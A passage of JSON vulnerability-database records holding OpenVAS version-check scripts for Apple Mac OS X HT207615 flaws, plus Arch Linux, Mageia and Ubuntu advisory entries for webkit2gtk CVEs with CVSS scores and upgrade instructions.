See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810994\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2017-2432\", \"CVE-2017-5029\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-19 11:40:15 +0530 (Fri, 19 May 2017)\");\n script_name(\"Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple memory\n corruption issues due to insufficient input validation and poor memory\n handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code and perform an out of bounds memory write.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3, 10.11.x through 10.11.6 and 10.10.x through 10.10.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade Apple Mac OS X 10.12.x to 10.12.4\n or apply the appropriate security patch for Apple Mac OS X 10.11.x and 10.10.x. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[0-2]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[0-2]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\n# if 10.11.x before 10.11.6 is running, update to 10.11.6 first and then apply patch\n# if 10.10.x before 10.10.5 is running, update to 10.10.5 first and then apply patch\nif(osVer =~ \"^10\\.1[01]\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\") ||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\" || osVer == \"10.10.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n ## applying patch on 10.11.6 will upgrade build version to 15G1421\n ## applying patch on 10.10.5 will upgrade build version to 14F2315\n if(buildVer)\n {\n if((osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G1421\")) ||\n (osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F2315\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\")){\n fix = \"10.12.4\";\n}\n\nif(fix)\n{\n report = 
report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-24T15:05:29", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2017-2486", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", 
"CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2392", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2017-2457", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310810728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810728", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207615\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810728\");\n script_version(\"2019-09-20T11:01:01+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\",\n \"CVE-2016-8743\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10160\",\n \"CVE-2016-10161\", \"CVE-2016-9935\", \"CVE-2017-2421\", \"CVE-2017-2438\",\n \"CVE-2017-2430\", \"CVE-2017-2462\", \"CVE-2017-2420\", \"CVE-2017-2427\",\n \"CVE-2017-2449\", \"CVE-2017-2379\", \"CVE-2017-2417\", \"CVE-2017-2431\",\n \"CVE-2017-2435\", \"CVE-2017-2450\", \"CVE-2017-2461\", \"CVE-2016-9586\",\n \"CVE-2016-7585\", \"CVE-2017-2429\", \"CVE-2017-2487\", \"CVE-2017-2406\",\n \"CVE-2017-2407\", \"CVE-2017-2439\", \"CVE-2017-2428\", \"CVE-2017-2418\",\n \"CVE-2017-2426\", \"CVE-2017-2416\", \"CVE-2017-2467\", \"CVE-2017-2489\",\n \"CVE-2016-3619\", \"CVE-2017-2443\", \"CVE-2017-2408\", \"CVE-2017-2436\",\n \"CVE-2017-2437\", \"CVE-2017-2388\", \"CVE-2017-2398\", \"CVE-2017-2401\",\n \"CVE-2017-2410\", \"CVE-2017-2440\", \"CVE-2017-2456\", \"CVE-2017-2472\",\n \"CVE-2017-2473\", \"CVE-2017-2474\", \"CVE-2017-2478\", \"CVE-2017-2482\",\n \"CVE-2017-2483\", \"CVE-2017-2458\", \"CVE-2017-2448\", \"CVE-2017-2390\",\n \"CVE-2017-2441\", \"CVE-2017-2402\", \"CVE-2017-2392\", \"CVE-2017-2457\",\n \"CVE-2017-2409\", \"CVE-2017-2422\", \"CVE-2016-10009\", \"CVE-2016-10010\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-7056\", \"CVE-2017-2403\",\n \"CVE-2016-5636\", \"CVE-2017-2413\", \"CVE-2017-2423\", \"CVE-2017-2451\",\n \"CVE-2017-2485\", \"CVE-2017-2425\", \"CVE-2017-2381\", \"CVE-2017-6974\",\n \"CVE-2016-7922\", 
\"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\",\n \"CVE-2016-7930\", \"CVE-2016-7931\", \"CVE-2016-7932\", \"CVE-2016-7933\",\n \"CVE-2016-7934\", \"CVE-2016-7935\", \"CVE-2016-7936\", \"CVE-2016-7937\",\n \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\", \"CVE-2016-7973\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\",\n \"CVE-2016-8574\", \"CVE-2016-8575\", \"CVE-2017-5202\", \"CVE-2017-5203\",\n \"CVE-2017-5204\", \"CVE-2017-5205\", \"CVE-2017-5341\", \"CVE-2017-5342\",\n \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\", \"CVE-2017-5485\",\n \"CVE-2017-5486\", \"CVE-2016-9533\", \"CVE-2016-9535\",\n \"CVE-2016-9536\", \"CVE-2016-9537\", \"CVE-2016-9538\", \"CVE-2016-9539\",\n \"CVE-2016-9540\", \"CVE-2017-2486\", \"CVE-2016-4688\", \"CVE-2017-2432\",\n \"CVE-2017-2490\", \"CVE-2017-7070\", \"CVE-2017-2477\", \"CVE-2017-5029\");\n script_bugtraq_id(95078, 95076, 91816, 94650, 95077, 95764, 95774, 95783, 95768,\n 94846, 97140, 97137, 95019, 97146, 85919, 97147, 97134, 95375,\n 96767, 94968, 94972, 94977, 94975, 91247, 97132, 95852, 94742,\n 94744, 94745, 94746, 94753, 94754, 94747, 97300, 97303);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 11:01:01 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 17:37:14 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple 
flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.4\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T16:34:11", "description": "Arch Linux Security Advisory ASA-201704-9\n=========================================\n\nSeverity: Critical\nDate : 2017-04-28\nCVE-ID : CVE-2016-9642 CVE-2016-9643 CVE-2017-2367 CVE-2017-2376\nCVE-2017-2377 CVE-2017-2386 CVE-2017-2392 CVE-2017-2394\nCVE-2017-2395 CVE-2017-2396 CVE-2017-2405 CVE-2017-2415\nCVE-2017-2419 
CVE-2017-2433 CVE-2017-2442 CVE-2017-2445\nCVE-2017-2446 CVE-2017-2447 CVE-2017-2454 CVE-2017-2455\nCVE-2017-2457 CVE-2017-2459 CVE-2017-2460 CVE-2017-2464\nCVE-2017-2465 CVE-2017-2466 CVE-2017-2468 CVE-2017-2469\nCVE-2017-2470 CVE-2017-2471 CVE-2017-2475 CVE-2017-2476\nCVE-2017-2481\nPackage : webkit2gtk\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-235\n\nSummary\n=======\n\nThe package webkit2gtk before version 2.16.1-1 is vulnerable to\nmultiple issues including arbitrary code execution, access restriction\nbypass, content spoofing, cross-site scripting, information disclosure,\nsame-origin policy bypass and denial of service.\n\nResolution\n==========\n\nUpgrade to 2.16.1-1.\n\n# pacman -Syu \"webkit2gtk>=2.16.1-1\"\n\nThe problems have been fixed upstream in version 2.16.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-9642 (denial of service)\n\nJavaScriptCore in WebKitGTK+ before 2.16.0 allows attackers to cause a\ndenial of service (out-of-bounds heap read) via a crafted Javascript\nfile.\n\n- CVE-2016-9643 (denial of service)\n\nThe regex code in WebKitGTK+ before 2.14.6 allows remote attackers to\ncause a denial of service (memory consumption) as demonstrated in a\nlarge number of ($ (open parenthesis and dollar) followed by {-2,16}\nand a large number of +) (plus close parenthesis).\n\n- CVE-2017-2367 (same-origin policy bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nweb site.\n\n- CVE-2017-2376 (content spoofing)\n\nAn issue has been found in WebKit, allowing remote attackers to spoof\nthe address bar by leveraging text input during the loading of a page.\n\n- CVE-2017-2377 (denial of service)\n\nThis issue involves the \u201cWebKit Web Inspector\u201d component. 
It allows\nattackers to cause a denial of service (memory corruption and\napplication crash) by leveraging a window-close action during a\ndebugger-pause state.\n\n- CVE-2017-2386 (same-origin policy bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nweb site.\n\n- CVE-2017-2392 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing attackers to execute\narbitrary code or cause a denial of service (memory corruption) via a\ncrafted app.\n\n- CVE-2017-2394 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2395 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2396 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2405 (arbitrary code execution)\n\nAn issue has been found in the \u201cWebKit Web Inspector\u201d component. 
It\nallows remote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) via a crafted web\nsite.\n\n- CVE-2017-2415 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code by leveraging an unspecified \u201ctype confusion.\u201d.\n\n- CVE-2017-2419 (access restriction bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\na Content Security Policy protection mechanism via unspecified vectors.\n\n- CVE-2017-2433 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2442 (same-origin policy bypass)\n\nAn issue has been found in WebKit, involving the \u201cWebKit JavaScript\nBindings\u201d component. It allows remote attackers to bypass the Same\nOrigin Policy and obtain sensitive information via a crafted web site.\n\n- CVE-2017-2445 (cross-site scripting)\n\nAn issue has been found in WebKit, allowing remote attackers to conduct\nUniversal XSS (UXSS) attacks via crafted frame objects.\n\n- CVE-2017-2446 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code via a crafted web site that leverages the mishandling of\nstrict mode functions.\n\n- CVE-2017-2447 (information disclosure)\n\nAn issue has been found in WebKit, allowing remote attackers to obtain\nsensitive information or cause a denial of service (memory corruption)\nvia a crafted web site.\n\n- CVE-2017-2454 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2455 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to 
execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2457 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2459 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2460 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2464 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2465 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2466 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2468 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2469 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- 
CVE-2017-2470 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2471 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in WebKit, allowing\nremote attackers to execute arbitrary code via a crafted web site.\n\n- CVE-2017-2475 (cross-site scripting)\n\nAn issue has been found in WebKit, allowing remote attackers to conduct\nUniversal XSS (UXSS) attacks via crafted use of frames on a web site.\n\n- CVE-2017-2476 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2481 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\nImpact\n======\n\nA remote attacker can bypass access restrictions, spoof content, access\nsensitive information, cause a crash and execute arbitrary code on the\naffected 
host.\n\nReferences\n==========\n\nhttps://webkitgtk.org/security/WSA-2017-0003.html\nhttps://security.archlinux.org/CVE-2016-9642\nhttps://security.archlinux.org/CVE-2016-9643\nhttps://security.archlinux.org/CVE-2017-2367\nhttps://security.archlinux.org/CVE-2017-2376\nhttps://security.archlinux.org/CVE-2017-2377\nhttps://security.archlinux.org/CVE-2017-2386\nhttps://security.archlinux.org/CVE-2017-2392\nhttps://security.archlinux.org/CVE-2017-2394\nhttps://security.archlinux.org/CVE-2017-2395\nhttps://security.archlinux.org/CVE-2017-2396\nhttps://security.archlinux.org/CVE-2017-2405\nhttps://security.archlinux.org/CVE-2017-2415\nhttps://security.archlinux.org/CVE-2017-2419\nhttps://security.archlinux.org/CVE-2017-2433\nhttps://security.archlinux.org/CVE-2017-2442\nhttps://security.archlinux.org/CVE-2017-2445\nhttps://security.archlinux.org/CVE-2017-2446\nhttps://security.archlinux.org/CVE-2017-2447\nhttps://security.archlinux.org/CVE-2017-2454\nhttps://security.archlinux.org/CVE-2017-2455\nhttps://security.archlinux.org/CVE-2017-2457\nhttps://security.archlinux.org/CVE-2017-2459\nhttps://security.archlinux.org/CVE-2017-2460\nhttps://security.archlinux.org/CVE-2017-2464\nhttps://security.archlinux.org/CVE-2017-2465\nhttps://security.archlinux.org/CVE-2017-2466\nhttps://security.archlinux.org/CVE-2017-2468\nhttps://security.archlinux.org/CVE-2017-2469\nhttps://security.archlinux.org/CVE-2017-2470\nhttps://security.archlinux.org/CVE-2017-2471\nhttps://security.archlinux.org/CVE-2017-2475\nhttps://security.archlinux.org/CVE-2017-2476\nhttps://security.archlinux.org/CVE-2017-2481", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": 
"3.0"}, "impactScore": 5.9}, "published": "2017-04-28T00:00:00", "type": "archlinux", "title": "[ASA-201704-9] webkit2gtk: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2017-04-28T00:00:00", "id": "ASA-201704-9", "href": "https://security.archlinux.org/ASA-201704-9", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Multiple security fixes in latest webkit2 update. 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-16T06:29:12", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2377", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2405", "CVE-2017-2419", "CVE-2017-2442", "CVE-2017-2446", "CVE-2017-2454", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2017-04-16T06:29:12", "id": "MGASA-2017-0109", "href": "https://advisories.mageia.org/MGASA-2017-0109.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:05:33", "description": "JavaScriptCore in WebKit allows attackers to cause a denial of service\n(out-of-bounds heap read) via a crafted Javascript file.\n\n#### Bugs\n\n * <https://bugs.webkit.org/show_bug.cgi?id=164000>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-02-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642"], "modified": "2017-02-03T00:00:00", "id": "UB:CVE-2016-9642", "href": "https://ubuntu.com/security/CVE-2016-9642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:04:24", "description": "The regex code in Webkit 2.4.11 allows remote attackers to cause a denial\nof service (memory consumption) as demonstrated in a large number of ($\n(open parenthesis and dollar) followed by {-2,16} and a large number of +)\n(plus close parenthesis).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9643", "bulletinFamily": "info", 